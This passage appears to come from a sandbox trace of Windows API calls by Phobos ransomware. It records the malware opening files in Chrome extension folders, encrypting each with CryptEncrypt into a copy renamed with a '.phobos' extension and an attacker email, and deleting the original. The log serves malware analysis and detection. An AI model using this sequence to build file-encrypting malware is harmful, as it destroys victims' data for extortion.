Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_tw\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0149.910] GetFileSizeEx (in: hFile=0x148, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=206) returned 1 [0149.910] CloseHandle (hObject=0x148) returned 1 [0149.910] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_tw\\messages.json")) returned 0x2020 [0149.910] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_TW\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_tw\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0149.910] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_tw\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0149.910] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0149.910] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0149.910] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_TW\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_tw\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0149.910] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32da8) returned 1 [0149.910] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0149.910] ReadFile (in: hFile=0x148, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xce, lpOverlapped=0x0) returned 1 [0149.911] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xd0, dwBufLen=0xd0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xd0) returned 1 [0149.911] WriteFile (in: hFile=0x190, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xd0, lpOverlapped=0x0) returned 1 [0149.912] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32c28) returned 1 [0149.912] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0149.912] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0149.912] CryptDestroyKey (hKey=0xa32c28) returned 1 [0149.912] WriteFile (in: hFile=0x190, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0149.913] CryptDestroyKey (hKey=0xa32da8) returned 1 [0149.913] CloseHandle (hObject=0x148) returned 1 [0149.913] CloseHandle (hObject=0x190) returned 1 [0149.913] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_tw\\messages.json")) returned 1 [0149.914] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0149.914] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\computed_hashes.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\computed_hashes.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0150.346] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=352) returned 1 [0150.346] CloseHandle (hObject=0x188) returned 1 [0150.346] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\computed_hashes.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\computed_hashes.json")) returned 0x2020 [0150.346] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\computed_hashes.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\computed_hashes.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0150.490] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\computed_hashes.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\computed_hashes.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0150.490] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0150.490] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0150.490] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\computed_hashes.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\computed_hashes.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0150.491] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32da8) returned 1 [0150.491] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0150.491] ReadFile (in: hFile=0x148, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x160, lpOverlapped=0x0) returned 1 [0150.491] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x170, dwBufLen=0x170 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x170) returned 1 [0150.491] WriteFile (in: hFile=0x188, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x170, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x170, lpOverlapped=0x0) returned 1 [0150.492] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa327e8) returned 1 [0150.492] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0150.492] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50, dwBufLen=0x50 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50) returned 1 [0150.492] CryptDestroyKey (hKey=0xa327e8) returned 1 [0150.492] WriteFile (in: hFile=0x188, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x102, lpOverlapped=0x0) returned 1 [0150.493] CryptDestroyKey (hKey=0xa32da8) returned 1 [0150.493] CloseHandle (hObject=0x148) returned 1 [0150.493] CloseHandle (hObject=0x188) returned 1 [0150.493] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\computed_hashes.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\computed_hashes.json")) returned 1 [0150.494] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0150.495] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\128.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\128.png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0150.495] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=6707) returned 1 [0150.495] CloseHandle (hObject=0x188) returned 1 [0150.495] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\128.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\128.png")) returned 0x2020 [0150.495] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\128.png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\128.png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0150.495] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\128.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\128.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0150.496] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0150.496] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0150.496] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\128.png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\128.png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0150.496] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32da8) returned 1 [0150.496] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0150.496] ReadFile (in: hFile=0x188, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x1a33, lpOverlapped=0x0) returned 1 [0150.677] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x1a40, dwBufLen=0x1a40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x1a40) returned 1 [0150.837] WriteFile (in: hFile=0x148, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x1a40, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x1a40, lpOverlapped=0x0) returned 1 [0151.378] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32c28) returned 1 [0151.378] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0151.378] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x30, dwBufLen=0x30 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x30) returned 1 [0151.378] CryptDestroyKey (hKey=0xa32c28) returned 1 [0151.378] WriteFile (in: hFile=0x148, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xe2, lpOverlapped=0x0) returned 1 [0151.378] CryptDestroyKey (hKey=0xa32da8) returned 1 [0151.378] CloseHandle (hObject=0x188) returned 1 [0151.378] CloseHandle (hObject=0x148) returned 1 [0151.378] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\128.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\128.png")) returned 1 [0151.379] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0151.379] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\128.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\128.png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0151.380] GetFileSizeEx (in: hFile=0x148, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=3406) returned 1 [0151.380] CloseHandle (hObject=0x148) returned 1 [0151.380] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\128.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\128.png")) returned 0x2020 [0151.380] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\128.png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\128.png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0151.380] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\128.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\128.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0151.380] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0151.380] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0151.380] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\128.png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\128.png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0151.380] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32da8) returned 1 [0151.380] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0151.380] ReadFile (in: hFile=0x148, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xd4e, lpOverlapped=0x0) returned 1 [0151.697] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xd50, dwBufLen=0xd50 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xd50) returned 1 [0151.697] WriteFile (in: hFile=0x188, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xd50, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xd50, lpOverlapped=0x0) returned 1 [0151.698] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32c28) returned 1 [0151.698] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0151.698] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x30, dwBufLen=0x30 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x30) returned 1 [0151.698] CryptDestroyKey (hKey=0xa32c28) returned 1 [0151.699] WriteFile (in: hFile=0x188, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xe2, lpOverlapped=0x0) returned 1 [0151.699] CryptDestroyKey (hKey=0xa32da8) returned 1 [0151.699] CloseHandle (hObject=0x148) returned 1 [0151.699] CloseHandle (hObject=0x188) returned 1 [0151.699] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\128.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\128.png")) returned 1 [0151.700] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0151.700] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ar\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ar\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0151.701] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=179) returned 1 [0151.701] CloseHandle (hObject=0x188) returned 1 [0151.701] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ar\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ar\\messages.json")) returned 0x2020 [0151.701] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ar\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ar\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0151.701] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ar\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ar\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0151.701] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0151.701] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0151.701] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 